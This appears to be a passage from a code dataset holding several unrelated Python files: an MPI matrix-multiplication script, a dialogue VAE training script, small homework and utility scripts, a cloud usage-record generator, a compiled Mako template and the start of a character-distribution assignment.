tag=MPI.ANY_TAG, status=status)\n                if status.Get_tag() == iterIndex:\n                    lastTagCounter += 1\n            iterIndex += 1\n        else:\n            while (sum(requiredCompIndex <= np.sum(recvVector, axis=1)).astype(int)) < numberOfGroups:\n                comm.Recv(Y, source=MPI.ANY_SOURCE, tag=MPI.ANY_TAG, status=status)\n                if status.Get_tag() == iterIndex:\n                    a = groupIndex(status.Get_source(), groupSize, int(Y[0][0]))\n                    recvVector[a[0]][a[1] - 1] = 1\n                    recvCounter += 1\n                else:\n                    prevRecv += 1\n            iterIndex += 1\n            message[0] = iterIndex\n            if iterIndex % 2 == 1:\n                for k in range(1, numberOfworkers + 1):\n                    comm.Send(message, dest=k)\n            else:\n                for k in range(numberOfworkers, 0, -1):\n                    comm.Send(message, dest=k)\n            print('Recv on iter ', recvCounter, ' Prev iter Recvs ', prevRecv)\n\n\nelse:\n    message = np.zeros(1)\n    sleepFlag = 1\n    Y = np.zeros([size, 1])\n    indexId = 0\n    multCounter = 0\n    sent = 0\n    buffer = 0\n    req = comm.Irecv(message, source=pm)\n    req2 = None\n    while iterIndex <= numberOfIter + 1:\n        if iterIndex == numberOfIter + 1:\n            comm.Send(Y, dest=pm, tag=iterIndex)\n            iterIndex += 1\n        else:\n            if sleepFlag != 1:\n                if random.uniform(0, 1) < p:\n                    time.sleep(tsleep)\n                sleepFlag = 1\n            if MPI.Request.Test(\n                    req) and sleepFlag and iterIndex <= numberOfIter: # check right 
away and after message sent.\n                iterIndex += 1\n                counter = 0\n                indexId = 0\n                sleepFlag = 0\n                buffer = 0\n                multCounter = 0\n                if iterIndex <= numberOfIter:\n                    req = comm.Irecv(message, source=pm)\n                    # print(\"message changed while waiting\")\n            if counter < numberOfComp and iterIndex <= numberOfIter and sleepFlag: # comp block\n                tet = np.random.rand(size, 1)\n                miniMult = np.matmul(X, tet) # (300,3000)x(3000,1)=(300,1) miniMatrix\n                startPoint = int((multCounter % miniComp) * int((size / miniComp))) # i.e: multCounter=15 ==> 1500\n                endPoint = int((multCounter % miniComp + 1) * int((size / miniComp))) # multCounter=15 ==> 1800\n                Y[startPoint:endPoint] = miniMult # change the Y values between (1500-1800,1) with minimult(300,1)\n                multCounter += 1\n                if multCounter >= miniComp and multCounter % miniComp == 0:\n                    counter += 1\n                    if counter in compVector:\n                        buffer += 1\n            if MPI.Request.Test(req) and sleepFlag and iterIndex <= numberOfIter: # check after comp\n                iterIndex += 1\n                counter = 0\n                indexId = 0\n                sleepFlag = 0\n                buffer = 0\n                multCounter = 0\n                if iterIndex <= numberOfIter:\n                    req = comm.Irecv(message, source=pm)\n                    # print(\"message changed in comp\")\n            if sleepFlag and buffer != 0 and sendCheck(req2) and iterIndex <= numberOfIter:\n                Y[0][0] = indexId\n                indexId += 1\n                req2 = comm.Issend(Y, dest=pm, tag=iterIndex)\n                if iterIndex == 1:\n                    req2.wait()\n                buffer -= 1\n                sent += 1\nMPI.Finalize()\n","sub_path":"GC_MM_C_ALT.py","file_name":"GC_MM_C_ALT.py","file_ext":"py","file_size_in_byte":4917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"310145037","text":"import os\nimport json\nimport time\nimport torch\nimport argparse\nimport numpy as np\nfrom multiprocessing import cpu_count\nfrom torch.utils.data import DataLoader\nfrom collections import OrderedDict, defaultdict\nimport pickle\nfrom tensorboardX import SummaryWriter\nfrom convlab2.policy.mle.idea5.utils import expierment_name\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n# define the loss function, model_dialogue could also use that.\npos_weights = torch.full([549], 2, dtype=torch.float).to(device)\nreconstruction_loss = torch.nn.BCEWithLogitsLoss(reduction=\"sum\", pos_weight=pos_weights)\nclassification_loss = torch.nn.BCEWithLogitsLoss(reduction=\"sum\")\n\ndef loss_fn(logp, target, disc_res, disc_tar):\n    loss1 = reconstruction_loss(logp, target)\n    loss2 = classification_loss(disc_res, disc_tar)\n    return loss1, loss2\n\n\ndef main(args):\n\n    ts = time.strftime('%Y-%b-%d-%H:%M:%S', time.gmtime())\n\n    # splits = ['train', 'val'] + (['test'] if args.test else [])\n    splits = ['train'] + (['test'] if args.test else [])\n\n    datasets_real = OrderedDict()\n    datasets_fake = OrderedDict()\n    for split in splits:\n        with open(os.path.join(\"/home/raliegh/图片/ConvLab-2/convlab2/policy/mle/processed_data\",\n                               'sa_element_{}_real.pkl'.format(split)), 'rb') as f:\n            datasets_real[split] = pickle.load(f)\n        # with open(os.path.join(\"/dockerdata/siyao/ft_local/ConvLab/convlab2/policy/mle/multiwoz/processed_data/\",\n        #                        'sa_element_{}_fake.pkl'.format(split)), 'rb') as f:\n        #     datasets_fake[split] = pickle.load(f)\n\n    model = dialogue_VAE(\n        
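# the fixed sizes below match the 549-dim dialogue vectors in the preprocessed data; the remaining hyperparameters come from the CLI args\n        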
max_sequence_length= 60,\n embedding_size= 549,\n rnn_type= \"gru\",\n hidden_size=args.hidden_size,\n word_dropout=args.word_dropout,\n embedding_dropout=args.embedding_dropout,\n latent_size=args.latent_size,\n num_layers=args.num_layers,\n bidirectional=args.bidirectional\n )\n\n model.to(device)\n # print(model)\n\n if args.tensorboard_logging:\n writer = SummaryWriter(os.path.join(args.logdir, expierment_name(args,ts)))\n writer.add_text(\"model\", str(model))\n writer.add_text(\"args\", str(args))\n writer.add_text(\"ts\", ts)\n\n save_model_path = os.path.join(args.save_model_path, ts)\n os.makedirs(save_model_path)\n\n def kl_anneal_function(anneal_function, step, k, x0):\n \"\"\"\n :param anneal_function:\n :param step:\n :param k:\n :param x0:\n :return:\n \"\"\"\n if anneal_function == 'logistic':\n return float(1/(1+np.exp(-k*(step-x0))))\n elif anneal_function == 'linear':\n return min(1, step/x0)\n\n # NLL = torch.nn.NLLLoss(size_average=False)\n # Reconstruction_loss = torch.nn.BCELoss(reduction=\"sum\")\n\n # def loss_fn(logp, target, length, mean, logv, anneal_function, step, k, x0):\n #\n # # cut-off unnecessary padding from target, and flatten\n # # target = target[:, :torch.max(length).item()].contiguous().view(-1)\n # # logp = logp.view(-1, logp.size(2))\n #\n # # Negative Log Likelihood\n # # NLL_loss = NLL(logp, target)\n # loss = reconstruction_loss(logp, target)\n #\n # # KL Divergence\n # KL_loss = -0.5 * torch.sum(1 + logv - mean.pow(2) - logv.exp())\n # KL_weight = kl_anneal_function(anneal_function, step, k, x0)\n #\n # return loss, KL_loss, KL_weight\n\n optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)\n\n tensor = torch.cuda.FloatTensor if torch.cuda.is_available() else torch.Tensor\n step = 0\n # start from here.\n batch_id = 0\n for epoch in range(args.epochs):\n for split in splits:\n\n data_loader_real = datasets_real[split][split]\n # data_loader_fake = datasets_fake[split][split]\n tracker = defaultdict(tensor)\n\n # Enable/Disable Dropout\n if split == 'train':\n model.train()\n else:\n model.eval()\n\n temp = []\n discriminator_target = []\n for iteration, batch in enumerate(data_loader_real):\n if batch.size(1) >1:\n temp.append(batch)\n a_sys = batch[0][-1][340:549].clone()\n domain = [0] * 9\n for i in range(a_sys.shape[0]):\n if a_sys[i].item() == 1.:\n if 0 <= i <= 39:\n domain[0] = 1\n elif 40 <= i <= 58:\n domain[8] = 1\n elif 59 <= i <= 63:\n domain[1] = 1\n elif 64 <= i <= 110:\n domain[2] = 1\n elif 111 <= i <= 114:\n domain[3] = 1\n elif 115 <= i <= 109:\n domain[4] = 1\n elif 110 <= i <= 160:\n domain[5] = 1\n elif 170 <= i <= 204:\n domain[6] = 1\n elif 205 <= i <= 208:\n domain[7] = 1\n\n # temp.append(data_loader_fake[iteration])\n # discriminator_target.append(1)\n # discriminator_target.append(0)\n\n discriminator_target.append(domain)\n\n if (iteration+1) % (args.batch_size) == 0:\n batch_size = len(temp)\n # Forward path for VAE\n original_input, logp, disc_res = model(temp)\n # original_input, logp, mean, logv, z = model(temp, max_len)\n\n # loss calculation\n loss1, loss2 = loss_fn(logp, original_input.to(\"cuda\"), disc_res, torch.tensor(discriminator_target).float().to(\"cuda\"))\n loss = loss1 + loss2 * 2\n if (batch_id+1) % 1000 == 0:\n print(\"loss1 & 2:\",loss1.item()/batch_size, loss2.item()/batch_size)\n # NLL_loss, KL_loss, KL_weight = loss_fn(logp, original_input.to(\"cuda\"),\n # max_len, mean, logv, args.anneal_function, step, args.k, args.x0)\n #loss = (NLL_loss + KL_weight * KL_loss)\n\n # 
evaluation stuff\n                    # backward + optimization\n                    if split == 'train':\n                        optimizer.zero_grad()\n                        loss.backward()\n                        optimizer.step()\n                        step += 1\n\n                    # bookkeeping\n                    tracker['ELBO'] = torch.cat((tracker['ELBO'], loss.detach().unsqueeze(0)))\n                    if split == \"test\":\n                        l1_loss = torch.sum(torch.abs((logp > 0.5).type(torch.FloatTensor) - original_input)).to(\"cuda\")\n                        tracker['l1_loss'] = torch.cat((tracker['l1_loss'], l1_loss.unsqueeze(0)))\n\n                    if args.tensorboard_logging and (batch_id+1) % args.print_every == 0:\n                        writer.add_scalar(\"%s/ELBO\"%split.upper(), loss.item()/batch_size, batch_id)\n                        # writer.add_scalar(\"%s/NLL Loss\"%split.upper(), NLL_loss.item()/batch_size, batch_id)\n                        # writer.add_scalar(\"%s/KL Loss\"%split.upper(), KL_loss.item()/batch_size, batch_id)\n                        # writer.add_scalar(\"%s/KL Weight\"%split.upper(), KL_weight, batch_id)\n\n                    # if (batchID+1) % args.print_every == 0: # or iteration+1 == len(data_loader):\n                    #     print(\"%s Batch %04d/%i, Loss %9.4f, NLL-Loss %9.4f, KL-Loss %9.4f, KL-Weight %6.3f\"\n                    #           %(split.upper(), batchID, len(data_loader)-1, loss.item()/batch_size, NLL_loss.item()/batch_size, KL_loss.item()/batch_size, KL_weight))\n\n                    # if split == 'valid':\n                    #     if 'target_sents' not in tracker:\n                    #         tracker['target_sents'] = list()\n                    #\n                    #     tracker['target_sents'] += idx2word(batch['target'].tolist(), i2w=datasets['train'].get_i2w(), pad_idx=datasets['train'].pad_idx)\n                    #     tracker['z'] = torch.cat((tracker['z'], z.data), dim=0)\n\n                    temp = []\n                    discriminator_target = []\n                    max_len = 0\n                    batch_id += 1\n\n            total_len = 0\n            for ele in temp:\n                total_len += ele.size(1)\n            print(\"evaluation: \", (torch.sum(original_input) / total_len).item(),\n                  (torch.sum(torch.abs((logp > 0).float() - original_input.to(\"cuda\"))) / total_len).item())\n\n            print(\"%s Epoch %02d/%i, Mean ELBO %9.4f\"%(split.upper(), epoch, args.epochs, torch.mean(tracker['ELBO'])/args.batch_size ))\n\n            if split == \"test\":\n                print(\"test L1 loss: \",(torch.mean(tracker['l1_loss']) / args.batch_size).item())\n\n            if args.tensorboard_logging:\n                writer.add_scalar(\"%s-Epoch/ELBO\"%split.upper(), torch.mean(tracker['ELBO']), epoch)\n\n            # save a dump of all sentences and the encoded latent space\n            if split == 'valid':\n                dump = {'target_sents':tracker['target_sents'], 'z':tracker['z'].tolist()}\n                if not os.path.exists(os.path.join('dumps', ts)):\n                    os.makedirs('dumps/'+ts)\n                with open(os.path.join('dumps/'+ts+'/valid_E%i.json'%epoch), 'w') as dump_file:\n                    json.dump(dump,dump_file)\n\n            # save checkpoint\n            if split == 'train' and (epoch+1) % 10 == 0:\n                checkpoint_path = os.path.join(save_model_path, \"E%i.pytorch\"%(epoch))\n                torch.save(model.state_dict(), checkpoint_path)\n                print(\"Model saved at %s\"%checkpoint_path)\n\n    save_path = \"./bin/\"\n    torch.save(model.state_dict(), save_path + \"idea7_domain_tiny_data.pol.mdl\")\n\n\nif __name__ == '__main__':\n    # args stuff\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--data_dir', type=str, default='data')\n    parser.add_argument('--create_data', action='store_true')\n    parser.add_argument('--max_sequence_length', type=int, default=60)\n    parser.add_argument('--min_occ', type=int, default=1)\n    parser.add_argument('--test', action='store_true')\n\n    parser.add_argument('-ep', '--epochs', type=int, default=10)\n    parser.add_argument('-bs', '--batch_size', type=int, default=32)\n    parser.add_argument('-lr', '--learning_rate', type=float, default=0.001)\n\n    parser.add_argument('-eb', '--embedding_size', type=int, default=549)\n    parser.add_argument('-rnn', '--rnn_type', type=str, 
default='gru')\n    parser.add_argument('-hs', '--hidden_size', type=int, default=512)\n    parser.add_argument('-nl', '--num_layers', type=int, default=1)\n    parser.add_argument('-bi', '--bidirectional', type=bool, default=True)\n    parser.add_argument('-ls', '--latent_size', type=int, default=256)\n    parser.add_argument('-wd', '--word_dropout', type=float, default=1)\n    parser.add_argument('-ed', '--embedding_dropout', type=float, default=1)\n\n    parser.add_argument('-af', '--anneal_function', type=str, default='logistic')\n    parser.add_argument('-k', '--k', type=float, default=0.0025)\n    parser.add_argument('-x0', '--x0', type=int, default=2500)\n\n    parser.add_argument('-v', '--print_every', type=int, default=20)\n    parser.add_argument('-tb', '--tensorboard_logging', action='store_true')\n    parser.add_argument('-log', '--logdir', type=str, default='logs')\n    parser.add_argument('-bin', '--save_model_path', type=str, default='bin')\n\n    args_idea5 = parser.parse_args()\n\n    args_idea5.rnn_type = args_idea5.rnn_type.lower()\n    args_idea5.anneal_function = args_idea5.anneal_function.lower()\n\n    assert args_idea5.rnn_type in ['rnn', 'lstm', 'gru']\n    assert args_idea5.anneal_function in ['logistic', 'linear']\n    assert 0 <= args_idea5.word_dropout <= 1\n    from utils import expierment_name\n    from convlab2.policy.mle.idea5.model_dialogue import dialogue_VAE\n    main(args_idea5)\n","sub_path":"convlab2/policy/mle/idea5/train_dialogue.py","file_name":"train_dialogue.py","file_ext":"py","file_size_in_byte":12827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"215841714","text":"import csv\nimport sys\n\ndef csv_to_list(file_name):\n# Reads the contents of a CSV into a list whose elements are lists, mimicking the structure of the CSV contents.\n    file = open(file_name)\n    list = [[item.strip() for item in line.split(',')] for line in file.readlines()]\n    file.close()\n    return list\n\ndef transpose_list(original_list):\n# Transposes a given list object and returns a transposed version of that list.\n    return map(list,zip(*original_list))\n\ndef main():\n\n    i = sys.argv[1]\n    d = transpose_list(csv_to_list(i))\n    o = open(i.split('.')[0]+'_transposed.csv','w')\n    w = csv.writer(o)\n    w.writerows(d)\n\nif __name__ == '__main__':\n    main()\n","sub_path":"transpose.py","file_name":"transpose.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"19227001","text":"#!/usr/bin/env python2.7-32\n# Arpin_P_204B_Sec1_HW4.py\n# Lance Thompson\n# Physics 204B 04\n# 3/25/2015\n\nfrom visual import *\nfrom visual.graph import *\n\nk, q, d = 8.99e9, 1.602e-19, 0.2e-9\n\noscillation = gdisplay(xtitle='Time', ytitle='Response (click and drag mouse to see coordinates)')\nfunct1 = gcurve(color=color.cyan)\nfunct2 = gcurve(delta=0.5, color=color.red)\nfunct3 = gcurve(color=color.yellow)\n\nfor t in arange(0.2e-9, 0.7e-9, 1e-11):\n    funct1.plot(pos=(t, (2 * k * q * d) / ((t ** 3) * ((1 - ((d / (2 * t)) ** 2)) ** 2))))\n    funct2.plot(pos=(t, (2 * k * q * d) / (t ** 3)))\n    funct3.plot(pos=(t, (2 * k * q * d) / (t ** 3) + ((k * q * (d ** 3)) / (t ** 5))))\n\nprint(\"1. Lance Thompson\")\nprint(\"3. The equation was good; the value of d of the red one is invalid at 3.491e-10.\\n 4. The yellow one is invalid \"\n      \"around 2.6943e-10. 
The criteria for a good result is when the lines are pretty much on top of each other.\\n\"\n \"This assignment took about 12 minutes.\")\n\n","sub_path":"p4/p4.py","file_name":"p4.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"513383475","text":"def main():\n avg = 0\n inti = 1\n input_file = open('numbers.txt', 'r')\n record = input_file.readline()\n record = record.rstrip('\\n')\n print('#' + str(inti), record)\n while record != \"\":\n record = input_file.readline()\n record = record.rstrip('\\n')\n inti += 1\n if record != \"\":\n print('#' + str(inti), record)\n avg += int(record)\n if record == \"\":\n print(\"The average of all the numbers is: \" + '{:.2f}'.format(avg / (inti - 1)))\n input_file.close()\n\n\nmain()\n","sub_path":"6.2/6.2.py","file_name":"6.2.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"134038640","text":"import argparse\nimport datetime\nimport cloud_data_types\nimport xml_operations\nimport data_structures\nimport logging\nimport random\nfrom math import floor, ceil\nfrom generator import Generator\n\nparser = argparse.ArgumentParser(description=\"MAD Generator, simulator of Cloud life.\")\n\nparser.add_argument(\n \"--output-type\",\n choices=[\"opennebulaxml\", \"records\"],\n required=True,\n help=\"Output type of MAD Generator. opennebulaxml (OpenNebula XML) or records\",\n)\n\nparser.add_argument(\n \"--count\",\n type=int,\n required=True,\n help=\"The number of events to generate\"\n)\n\nparser.add_argument(\n \"--start-time\",\n type=datetime.datetime.fromisoformat,\n default=datetime.datetime.today() - datetime.timedelta(days=100),\n help=\"First TimeStamp of whole simulation - format YYYY-MM-DD\",\n)\n\nparser.add_argument(\n \"--max-objects\",\n type=int,\n required=True,\n help=\"Max number of available existing objects\",\n)\n\n\nparser.add_argument(\n \"--average-occupancy\",\n type=int,\n default=50,\n help=\"The percentage number of objects out of the maximum, which should exist on average\",\n)\n\nparser.add_argument(\n \"--records-per-file\",\n type=int,\n default=500,\n help=\"Number of records to be stored per file. 
Default=500\",\n)\n\nparser.add_argument(\n    '--cron-interval',\n    type=int,\n    default=60*60*24,\n    help='Interval of \"cron-triggered\" events'\n)\n\nparser.add_argument(\n    \"--users-count\", type=int, default=20, help=\"Users using simulated cloud\"\n)\n\nparser.add_argument(\n    \"--groups-count\", type=int, default=7, help=\"Groups in simulated cloud\"\n)\n\nparser.add_argument(\n    \"--cloud-name\", type=str, default=\"MADCLOUD\", help=\"name of the cloud\"\n) # SiteName/CloudType/CloudComputeService\n\n\nparser.add_argument(\n    \"--mode\",\n    choices=[\"vm\", \"network\", \"storage\"],\n    required=True,\n    help=\"In which mode will MAD Generator run\",\n)\n\nparser.add_argument(\n    \"-f\", \"--flood\", action=\"store_true\", default=False, help=\"Flood mode\"\n)\n\nparser.add_argument(\n    \"-d\",\n    \"--debug\",\n    action=\"store_false\",\n    default=True,\n    help=\"Enable debug mode with logs\",\n)\n\nCONF = parser.parse_args()\nlogging.basicConfig(\n    level=logging.DEBUG,\n    format=\"%(asctime)s - %(filename)s:%(lineno)d - #%(process)d %(levelname)s: %(message)s\",\n)\nif CONF.debug:\n    logging.disable(logging.CRITICAL)\n\nlogging.debug(\"Arguments parsed:\")\nlogging.debug(CONF)\n\n\nif CONF.output_type == \"opennebulaxml\":\n    xml_operator = xml_operations.XmlOperator()\n    cloud_datastores = data_structures.Datastores()\n\n    for x in range(CONF.users_count):\n\n        user = cloud_data_types.User(CONF)\n        print(user.uname)\n        xml_operator.output(user)\n\n    # flood means generating all types of outputs i.e. image, cluster, host, vm\n    if CONF.flood:\n\n        for x in range(random.randint(1, CONF.max_objects)):\n\n            vm = cloud_data_types.Vm(CONF)\n\n            vm.uname = cloud_data_types.User.users_dict[vm.uid][\"uname\"]\n            vm.gid = cloud_data_types.User.users_dict[vm.uid][\"gid\"]\n            vm.gname = cloud_data_types.User.users_dict[vm.uid][\"gname\"]\n\n            xml_operator.output(vm)\n\n        for z in range(10):\n\n            image = cloud_data_types.Image(CONF)\n\n            image.uname = cloud_data_types.User.users_dict[image.uid][\"uname\"]\n            image.gid = cloud_data_types.User.users_dict[image.uid][\"gid\"]\n            image.gname = cloud_data_types.User.users_dict[image.uid][\"gname\"]\n\n            datastore = cloud_datastores.getNewDatastore()\n\n            image.datastore_id = datastore[\"datastore_id\"]\n            image.datastore = datastore[\"datastore\"]\n\n            xml_operator.output(image)\n\n        for z in range(10):\n\n            host = cloud_data_types.Host()\n\n            xml_operator.output(host)\n\n        for z in range(10):\n\n            cluster = cloud_data_types.Cluster()\n\n            xml_operator.output(cluster)\nelse:\n    gen = Generator(datetime.datetime.timestamp(CONF.start_time),\n                    CONF.cron_interval,\n                    CONF.count,\n                    CONF.users_count,\n                    int(floor((0.8 * CONF.average_occupancy / 100) * CONF.max_objects / CONF.users_count)),\n                    int(ceil((1.2 * CONF.average_occupancy / 100) * CONF.max_objects / CONF.users_count)),\n                    CONF.groups_count,\n                    CONF.cloud_name,\n                    CONF.records_per_file)\n\n    if CONF.flood:\n        logging.debug(\"FLOOD in record mode\")\n        gen.generate_cloud_records()\n        gen.generate_ip_records()\n        gen.generate_storage_records()\n    else:\n        if CONF.mode == \"vm\":\n            logging.debug(\"Generating VM records\")\n            gen.generate_cloud_records()\n        if CONF.mode == \"storage\":\n            logging.debug(\"Generating Storage records\")\n            gen.generate_storage_records()\n        if CONF.mode == \"network\":\n            logging.debug(\"Generating Network records\")\n            gen.generate_ip_records()\n\n","sub_path":"mad.py","file_name":"mad.py","file_ext":"py","file_size_in_byte":4987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"290103495","text":"# -*- coding:ascii -*-\nfrom mako import runtime, filters, cache\nUNDEFINED = runtime.UNDEFINED\n__M_dict_builtin = dict\n__M_locals_builtin = locals\n_magic_number = 10\n_modified_time = 1422405386.993231\n_enable_loop = True\n_template_filename = '/Users/John/DevProjects/chef/homepage/templates/viewEvent.html'\n_template_uri = 'viewEvent.html'\n_source_encoding = 'ascii'\nimport os, os.path, re\n_exports = ['content', 'navbar_links', 'tab_title', 'paper_elements_import', 'footer_links']\n\n\ndef _mako_get_namespace(context, name):\n try:\n return context.namespaces[(__name__, name)]\n except KeyError:\n _mako_generate_namespaces(context)\n return context.namespaces[(__name__, name)]\ndef _mako_generate_namespaces(context):\n pass\ndef _mako_inherit(template, context):\n _mako_generate_namespaces(context)\n return runtime._inherit_from(context, '/base_app/templates/base.htm', _template_uri)\ndef render_body(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n def content():\n return render_content(context._locals(__M_locals))\n def footer_links():\n return render_footer_links(context._locals(__M_locals))\n def tab_title():\n return render_tab_title(context._locals(__M_locals))\n def paper_elements_import():\n return render_paper_elements_import(context._locals(__M_locals))\n def navbar_links():\n return render_navbar_links(context._locals(__M_locals))\n __M_writer = context.writer()\n __M_writer('\\n\\n')\n __M_writer('\\n\\n')\n if 'parent' not in context._data or not hasattr(context._data['parent'], 'tab_title'):\n context['self'].tab_title(**pageargs)\n \n\n __M_writer('\\n\\n')\n if 'parent' not in context._data or not hasattr(context._data['parent'], 'paper_elements_import'):\n context['self'].paper_elements_import(**pageargs)\n \n\n __M_writer('\\n\\n')\n if 'parent' not in context._data or not hasattr(context._data['parent'], 'navbar_links'):\n context['self'].navbar_links(**pageargs)\n \n\n __M_writer('\\n\\n')\n if 'parent' not in context._data or not hasattr(context._data['parent'], 'content'):\n context['self'].content(**pageargs)\n \n\n __M_writer('\\n\\n')\n if 'parent' not in context._data or not hasattr(context._data['parent'], 'footer_links'):\n context['self'].footer_links(**pageargs)\n \n\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_content(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n def content():\n return render_content(context)\n __M_writer = context.writer()\n __M_writer('\\n\\n\\t
\\n\\t\\t

Event Information

\\n\\t
\\n\\n')\n __M_writer('\\t
\\n\\n')\n __M_writer('\\t
\\n')\n __M_writer('\\t\\t\\n\\n')\n __M_writer('\\t\\t\\t\\n\\t\\t\\t\\t\\n\\t\\t\\t\\n')\n __M_writer('\\n')\n __M_writer('\\t\\t\\t\\n\\t\\t\\t\\t\\n\\t\\t\\t\\n')\n __M_writer('\\n')\n __M_writer('\\t\\t\\t\\n\\t\\t\\t\\t\\n\\t\\t\\t\\n')\n __M_writer('\\n')\n __M_writer('\\t\\t\\t\\n\\t\\t\\t\\t\\n\\t\\t\\t\\n')\n __M_writer('\\n\\t\\t\\t

Venue Information

\\n\\n')\n __M_writer('\\t\\t\\t\\n\\t\\t\\t\\t\\n\\t\\t\\t\\n')\n __M_writer('\\n')\n __M_writer('\\t\\t\\t\\n\\t\\t\\t\\t\\n\\t\\t\\t\\n')\n __M_writer('\\n')\n __M_writer('\\t\\t\\t\\n\\t\\t\\t\\t\\n\\t\\t\\t\\n')\n __M_writer('\\n')\n __M_writer('\\t\\t\\t\\n\\t\\t\\t \\n\\t\\t\\t \\n\\t\\t\\t TX\\n\\t\\t\\t TX\\n\\t\\t\\t TX\\n\\t\\t\\t \\n\\t\\t\\t \\n\\t\\t\\t\\n')\n __M_writer('\\n')\n __M_writer('\\t\\t\\t\\n\\t\\t\\t\\t\\n\\t\\t\\t\\n')\n __M_writer('\\n\\t\\t\\n')\n __M_writer('\\t\\t\\t\\n\\t
\\n')\n __M_writer('\\n')\n __M_writer('\\t
\\n\\n\\t \\t

Related Actions

\\n\\n')\n __M_writer('\\t\\tUpload Map\\n')\n __M_writer('\\n')\n __M_writer('\\t\\tView Related Areas\\n')\n __M_writer('\\n')\n __M_writer('\\t\\tView Map\\n')\n __M_writer('\\n')\n __M_writer('\\t\\tView Items for Sale\\n')\n __M_writer('\\n')\n __M_writer('\\t\\tCancel Event\\n')\n __M_writer('\\n\\t
\\n')\n __M_writer('\\n\\t
\\n')\n __M_writer('\\n\\t
\\n\\t
\\n\\t
\\n\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_navbar_links(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n def navbar_links():\n return render_navbar_links(context)\n __M_writer = context.writer()\n __M_writer('\\n \\t\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_tab_title(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n def tab_title():\n return render_tab_title(context)\n __M_writer = context.writer()\n __M_writer('\\n Event Information\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_paper_elements_import(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n def paper_elements_import():\n return render_paper_elements_import(context)\n __M_writer = context.writer()\n __M_writer('\\n\\t\\n\\t\\n\\t\\n\\t\\n\\t\\n\\t\\n\\t\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_footer_links(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n def footer_links():\n return render_footer_links(context)\n __M_writer = context.writer()\n __M_writer('\\n')\n __M_writer('\\t
\\n\\n')\n __M_writer('\\t\\t
\\n\\t\\t \\t

Users

\\n\\t \\t\\t\\n\\t\\t
\\n')\n __M_writer('\\n')\n __M_writer('\\t\\t
\\n\\t\\t \\t

Items

\\n\\t\\t \\t\\n\\t\\t
\\n')\n __M_writer('\\n')\n __M_writer('\\t\\t
\\n\\t\\t \\t

Events

\\n\\t\\t \\t\\n\\t\\t
\\n')\n __M_writer('\\n\\t
\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\n\"\"\"\n__M_BEGIN_METADATA\n{\"line_map\": {\"128\": 25, \"192\": 186, \"134\": 11, \"140\": 11, \"146\": 15, \"153\": 15, \"154\": 16, \"27\": 0, \"156\": 17, \"157\": 17, \"158\": 18, \"159\": 18, \"160\": 19, \"161\": 19, \"162\": 20, \"155\": 16, \"164\": 21, \"163\": 20, \"166\": 22, \"167\": 22, \"43\": 7, \"44\": 9, \"173\": 154, \"49\": 13, \"179\": 154, \"180\": 156, \"181\": 159, \"54\": 23, \"183\": 169, \"184\": 179, \"185\": 181, \"186\": 191, \"59\": 33, \"64\": 152, \"182\": 167, \"74\": 35, \"80\": 35, \"81\": 42, \"82\": 45, \"83\": 47, \"84\": 50, \"85\": 54, \"86\": 56, \"87\": 60, \"88\": 62, \"89\": 66, \"90\": 68, \"91\": 72, \"92\": 76, \"93\": 80, \"94\": 82, \"95\": 86, \"96\": 88, \"97\": 92, \"98\": 94, \"99\": 104, \"100\": 106, \"101\": 110, \"102\": 113, \"103\": 116, \"104\": 118, \"105\": 123, \"106\": 125, \"107\": 127, \"108\": 129, \"109\": 131, \"110\": 133, \"111\": 135, \"112\": 137, \"113\": 139, \"114\": 141, \"115\": 144, \"116\": 147, \"122\": 25, \"165\": 21}, \"source_encoding\": \"ascii\", \"uri\": \"viewEvent.html\", \"filename\": \"/Users/John/DevProjects/chef/homepage/templates/viewEvent.html\"}\n__M_END_METADATA\n\"\"\"\n","sub_path":"homepage/cached_templates/templates/viewEvent.html.py","file_name":"viewEvent.html.py","file_ext":"py","file_size_in_byte":10845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"470062639","text":"\"\"\"\ndistribution.py\nAuthor: Andy\nCredit: Milo the Almighty Savior of All Existence\n\nAssignment:\n\nWrite and submit a Python program (distribution.py) that computes and displays \nthe distribution of characters in a given sample of text.\n\nOutput of your program should look like this:\n\nPlease enter a string of text (the bigger the better): The rain in Spain stays mainly in the plain.\nThe distribution of characters in \"The rain in Spain stays mainly in the plain.\" is:\niiiiii\nnnnnnn\naaaaa\nsss\nttt\nee\nhh\nll\npp\nyy\nm\nr\n\nNotice about this example:\n\n* The text: 'The rain ... plain' is provided by the user as input to your program.\n* Uppercase characters are converted to lowercase\n* Spaces and punctuation marks are ignored completely.\n* Characters that are more common appear first in the list.\n* Where the same number of characters occur, the lines are ordered alphabetically. 
